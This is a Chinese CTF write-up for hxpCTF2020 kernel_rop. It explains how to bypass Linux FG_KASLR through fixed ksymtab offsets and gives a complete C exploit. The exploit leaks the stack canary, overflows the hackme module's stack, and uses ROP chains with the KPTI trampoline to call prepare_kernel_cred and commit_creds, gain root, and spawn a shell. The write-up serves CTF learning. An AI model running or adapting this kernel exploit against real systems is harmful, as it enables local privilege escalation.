Kernel_pwn FG_KASLR in ROP

Kernel_pwn FG_KASLR in ROP

第一次遇到FG_KASLR机制,算是KASLR的加强版,加大了一些ROP的难度,但仍有bypass的方法。题目来自hxpCTF2020 kernel_rop。

FG_KASLR

首先了解下FG_KASLR:
全称是Function Granular KASLR,译为函数颗粒化地址随机分布。我们知道,开启一般的KASLR会使得每次目标文件加载到的内存起始地址会随机化,但只要能leak一个在相应内存区域的地址,我们就能通过其offset固定的原因得到任何一个在此内存区域的地址。

文档对FG_KASLR描述为:

1
2
3
4
This patch set is an implementation of finer grained kernel address space
randomization. It rearranges your kernel code at load time 
on a per-function level granularity, with only around a second added to
boot time.

和KASLR不同,FG_KASLR做了更随机化。它在load的时候按照函数级别的细粒度来重排内核代码,这样做它的boot time增加了1秒,但使得我们通过offset的方法得到真实地址的方法”破灭“。即使我们leak出了一个在.text段的地址,但FG_KASLR是函数级上的随机化,对函数的重排使得offset也变得随机化,我们也就无法通过leak_addr+offset来确定地址了。

这是我一开始看到这个机制的想法,但当我做到一道开了FG_KASLR的kernel_pwn之后,才发现我too yuang too simple了。

hxpCTF2020 kernel_rop

拿到题目后发现内核版本为vmlinuz: Linux kernel x86 boot executable bzImage, version 5.9.0-rc6+算是比较新了。

接着查看etc/init.d/里的rcS初始化脚本看到insmod了hackme.ko,应该就是有漏洞的模块了。

模块提供了hackme_read()hackme_write()功能,漏洞在write功能里:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
ssize_t __fastcall hackme_write(file *f, const char *data, size_t size, loff_t *off)
{
  unsigned __int64 v4; // rdx
  ssize_t v5; // rbx
  int tmp[32]; // [rsp+0h] [rbp-A0h] BYREF
  unsigned __int64 v8; // [rsp+80h] [rbp-20h]

  _fentry__();
  v5 = v4;
  v8 = __readgsqword(0x28u);
  if ( v4 > 0x1000 )
  {
    _warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL);
    BUG();
  }
  _check_object_size(hackme_buf, v4, 0LL);
  if ( copy_from_user(hackme_buf, data, v5) )
    return -14LL;
  _memcpy(tmp, hackme_buf, v5);
  return v5;
}

_memcpy(tmp, hackme_buf, v5);造成栈溢出。因此利用方法就比较明确了,先利用read功能leak地址,找gadgets,之后rop执行commit_creds(prepare_kernel_cred(0))提权。

首先leak地址:

1
read(global_fd, leak, sizeof(leak));

传入一个leak数组,看下都读到了啥:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
0: 0xffff888007201020                                                     
1: 0xfe0
2: 0x71e8e82fd1c6c600
3: 0xffff88800647b210
4: 0xffffc900001c7e68
5: 0x4
6: 0xffff88800647b200
7: 0xffffc900001c7ef0
8: 0xffff88800647b200
9: 0xffffc900001c7e80
10: 0xffffffff8184e047
11: 0xffffffff8184e047
12: 0xffff88800647b200
13: (nil)
14: 0x7fff6f105830
15: 0xffffc900001c7ea0
16: 0x71e8e82fd1c6c600
17: 0x140
18: (nil)
19: 0xffffc900001c7ed8
20: 0xffffffff816d51ff
21: 0xffff88800647b200
22: 0xffff88800647b200
23: 0x7fff6f105830
24: 0x140
25: (nil)
26: 0xffffc900001c7f20
27: 0xffffffff816d5727
28: 0xffffffff8152b8a1
29: (nil)
30: 0x71e8e82fd1c6c600
31: 0xffffc900001c7f58
32: (nil)
33: (nil)
34: (nil)
35: 0xffffc900001c7f30
36: 0xffffffff816d577a
37: 0xffffc900001c7f48
38: 0xffffffff8100a157
39: (nil)

多重复leak几次后会发现leak[38]处的0xffffffff8100a157是没变化的,而且这个地址是kernel image里的地址,因此通过这个地址我们容易得到image_base的地址。
接着我们先手动root下,通过/proc/kallsyms去找找函数地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
38: 0xffffffffa820a157                                    
39: (nil)      
image base: 0xffffffffa8200000
/ # cat /proc/kallsyms | grep "commit_creds"
ffffffffa8c93f90 T commit_creds
ffffffffa9187d90 r __ksymtab_commit_creds
ffffffffa91a0972 r __kstrtab_commit_creds
ffffffffa91a4d42 r __kstrtabns_commit_creds

38: 0xffffffffb260a157
39: (nil)
image base: 0xffffffffb2600000
/ # cat /proc/kallsyms | grep "commit_creds"
ffffffffb2a2e6c0 T commit_creds
ffffffffb3587d90 r __ksymtab_commit_creds
ffffffffb35a0972 r __kstrtab_commit_creds
ffffffffb35a4d42 r __kstrtabns_commit_creds

上面是两次启动qemu后先leak地址在通过/proc/kallsyms查看函数地址得到的结果。commit_creds函数和image_base的offset分别为0xa93f90和0x42e6c0,可以看到,我们无法通过image_base+offset来得到commit_creds()的地址,这也是开启了FG_KASLR的效果。

但在计算__ksymtab_commit_credsimage_base的偏移时发现:

1
2
3
4
>>> hex(0xffffffffa9187d90-0xffffffffa8200000)
'0xf87d90L'
>>> hex(0xffffffffb3587d90-0xffffffffb2600000)
'0xf87d90L'

offset是固定的。可以看到,FG_KASLR并没有做到Kernel地址的完全随机化,没有受到影响的区域如下:

1、存在于.text_base__x86_retpoline_r15(.text+400dc6)的函数没有受到影响。显然commit_credsprepare_kernel_cred()没有包含在内,但我们还是可以在这里找一些gadget的。

2、KPIT trampolineswapgs_restore_regs_and_return_to_usermode()没有受到影响。

3.内核符号表(kernel symbol table)ksymtab开始于.text+0xf85198没有受到影响。

这也说明了我们计算__ksymtab_commit_creds的偏移固定的原因。ksymtab的结构如下

1
2
3
4
5
struct kernel_symbol {
	  int value_offset;
	  int name_offset;
	  int namespace_offset;
};

其中value_offset是ksymtab到对应函数的偏移,以commit_creds函数为例就是__ksymtab_commit_creds + value_offset = commit_creds

使用到的gadgets有:

1
2
3
pop_rax_ret = image_base + 0x4d11;
mov_eax_ind_rax_ret = image_base + 0x4aae;
pop_rdi_ret = image_base + 0x38a0;

思路如下:

1、通过read功能leak出image_base和stack里的cookie,分别对应leak[38]leak[2]

2、通过image_base+offset计算__ksymtab_commit_creds__ksymtab_prepare_kernel_cred()以及gadgets地址。

3、构造ROP,利用gadget将ksymtab的value_offset存放rax,再利用KPTI trampoline返回userland得到其值,计算得真实函数地址,再做一次类似的ROP从而得到commit_creds()prepare_kernel_cred()函数地址。

4、由于有KPTI而且我们的gadget里没有能类似mov rdi, rax的功能,只能分解利用的过程。我们的ROP应使用KPTI trampoline将提权分成两个stage:1.ROP执行prepare_kernel_cred(0),执行结果于rax,利用KPTI trampoline返回userland得到rax值(即cred_struct_va)。2.ROP执行commit_cred(cred_struct_va),利用KPTI trampoline返回userland执行system('/bin/sh');

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <sys/wait.h>
#include <poll.h>
#include <unistd.h>
#include <stdlib.h>
#include <inttypes.h>


uint64_t user_cs, user_ss, user_rflags, user_sp;

int global_fd;
char flag_buf[256];
uint64_t cookie;
uint64_t image_base;
uint64_t swapgs_restore_regs_and_ret_to_uspace; // start after popping rax
uint64_t zero_rax_ret; // xor eax, eax; ret;
uint64_t write_mem_ret; // mov qword ptr [rbx], rax; pop rbx; pop rbp; ret;
uint64_t pop_rax_ret; // pop rax; ret
uint64_t mov_eax_ind_rax_ret; // mov eax, qword ptr [rax + 0x10]; pop rbp; ret;
uint64_t pop_rdi_ret; // pop rdi; pop rbp; ret;
uint64_t ksymtab_prepare_kernel_cred;
uint64_t ksymtab_commit_creds;
uint64_t prepare_kernel_cred;
uint64_t commit_creds;
uint64_t creds_struct_va;

enum current_state{
    current_state_read_ksymtab_prepare_kernel_cred,
    current_state_read_ksymtab_commit_creds,
    current_state_escalate_privileges_stage1,
    current_state_escalate_privileges_stage2,
};

void safe_exit(void);

int open_dev(){
    int fd = open("/dev/hackme", O_RDWR);
    if(fd < 0){
        printf("open faild!");
        exit(1);
    }
    return fd;
}

void save_state(void){
    asm(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "movq %%rsp, %3;\n"
        "pushfq\n"
        "pop %2\n"
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags), "=r"(user_sp)
        :
        : "memory");
    printf("%lx %lx %lx %lx\n", user_cs, user_ss, user_rflags, user_sp);

}

void print_leak(uint64_t leak[], int n){
    for(int i = 0 ; i < n ; i++){
        printf("%d: %p\n",i ,leak[i]);
    }
}

void get_gadget_offset(){
    int n = 40;
    uint64_t leak[n];
    read(global_fd, leak, sizeof(leak));
    cookie = leak[2];
    image_base = leak[38] - 0xa157;
    swapgs_restore_regs_and_ret_to_uspace = image_base + 0x200f10 + 19;
    zero_rax_ret = image_base + 0x3b91;
    pop_rax_ret = image_base + 0x4d11;
    mov_eax_ind_rax_ret = image_base + 0x4aae;
    pop_rdi_ret = image_base + 0x38a0;
    ksymtab_prepare_kernel_cred = image_base + 0xf8d4fcUL;
    ksymtab_commit_creds = image_base + 0xf87d90UL;

    print_leak(leak, n);
    printf("cookie: %p\n", cookie);
    printf("image base: %p\n", image_base);
}

enum current_state global_cstate;

void read_address(){
    int write_n = 50;
    int i = 16;
    uint64_t rop[write_n];
    rop[i++] = cookie;
    rop[i++] = 0;            // rbx
    rop[i++] = 0x1;          // r12
    rop[i++] = 0x20000000;    // rbp
    rop[i++] = pop_rax_ret;
    if(global_cstate == current_state_read_ksymtab_prepare_kernel_cred){
        rop[i++] = ksymtab_prepare_kernel_cred - 0x10;
    }
    else if(global_cstate == current_state_read_ksymtab_commit_creds){
        rop[i++] = ksymtab_commit_creds - 0x10;
    }
    else{
        printf("state error");
        exit(-1);
    }
    rop[i++] = mov_eax_ind_rax_ret;
    rop[i++] = user_sp; // pop rbp
    rop[i++] = swapgs_restore_regs_and_ret_to_uspace;
    rop[i++] = 0xccdd;
    rop[i++] = 0x33333;
    rop[i++] = 0x666666;
    rop[i++] = 0x666666;
    rop[i++] = 0x666666;
    rop[i++] = (uint64_t)safe_exit;    //rip
    rop[i++] = user_cs;
    rop[i++] = user_rflags;
    rop[i++] = user_sp;
    rop[i++] = user_ss;
    write(global_fd, rop, sizeof(rop));
    // Should never be reached
    exit(-1);
}

void escalate_privileges(){
    int write_n = 50;
    uint64_t rop[write_n];
    int i = 16;
    rop[i++] = cookie;
    rop[i++] = 0x0; // rbx
    rop[i++] = 0x1; // r12
    rop[i++] = 0x20000000; // rbp
    if (global_cstate == current_state_escalate_privileges_stage1){
        rop[i++] = pop_rdi_ret; 
        rop[i++] = 0; // rdi
        rop[i++] = user_sp; // rbp
        rop[i++] = prepare_kernel_cred;
    }
    else if(global_cstate == current_state_escalate_privileges_stage2){
        rop[i++] = pop_rdi_ret; 
        rop[i++] = creds_struct_va; // rdi
        rop[i++] = user_sp; // rbp
        rop[i++] = commit_creds;
    }
    rop[i++] = swapgs_restore_regs_and_ret_to_uspace;
    rop[i++] = 0xccdd;
    rop[i++] = 0x33333;
    rop[i++] = 0x666666;
    rop[i++] = 0x666666;
    rop[i++] = 0x666666;
    rop[i++] = (uint64_t)safe_exit;
    rop[i++] = user_cs;
    rop[i++] = user_rflags;
    rop[i++] = user_sp;
    rop[i++] = user_ss;
    write(global_fd, rop, sizeof(rop));
    // Should never be reached
    exit(-1);
}

void safe_exit(){
    uint64_t rax;
    uint64_t rbp;
    asm volatile(
        "mov %%rax, %0\n\t"
        : "=r"(rax), "=r"(rbp)
    );
    printf("returned from kernel: %lx\n", rax);
    if(global_cstate == current_state_read_ksymtab_prepare_kernel_cred){
        prepare_kernel_cred = ksymtab_prepare_kernel_cred + (int)rax;
        global_cstate = current_state_read_ksymtab_commit_creds;
        read_address();
    }
    else if(global_cstate == current_state_read_ksymtab_commit_creds){
        commit_creds = ksymtab_commit_creds + (int)rax;
        printf("prepare_kernel_cred: 0x%lx\n", prepare_kernel_cred);
        printf("commit_creds : 0x%lx\n", commit_creds);
        global_cstate = current_state_escalate_privileges_stage1;
        escalate_privileges();
    }
    else if(global_cstate == current_state_escalate_privileges_stage1){
        creds_struct_va = rax;
        printf("creds_struct_va: 0x%lx\n", creds_struct_va);
        global_cstate = current_state_escalate_privileges_stage2;
        escalate_privileges();
    }
    else if(global_cstate == current_state_escalate_privileges_stage2){
        if(getuid() == 0){
            printf("Flag: \n");
            FILE *f = fopen("/dev/sda", "r");
            fread(flag_buf, 1, sizeof(flag_buf), f);
            puts(flag_buf);
            system("/bin/sh");
        }
        else{
            printf("not root yet\n");
            exit(-1);
        }
    }

}

int main(){
    save_state();
    global_fd = open_dev();
    get_gadget_offset();
    global_cstate = current_state_read_ksymtab_prepare_kernel_cred;
    read_address();
    return 0;
}

参考:
https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/
https://hxp.io/blog/81/hxp-CTF-2020-kernel-rop/

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

Pwner<br>CTF is a part of my life.<br>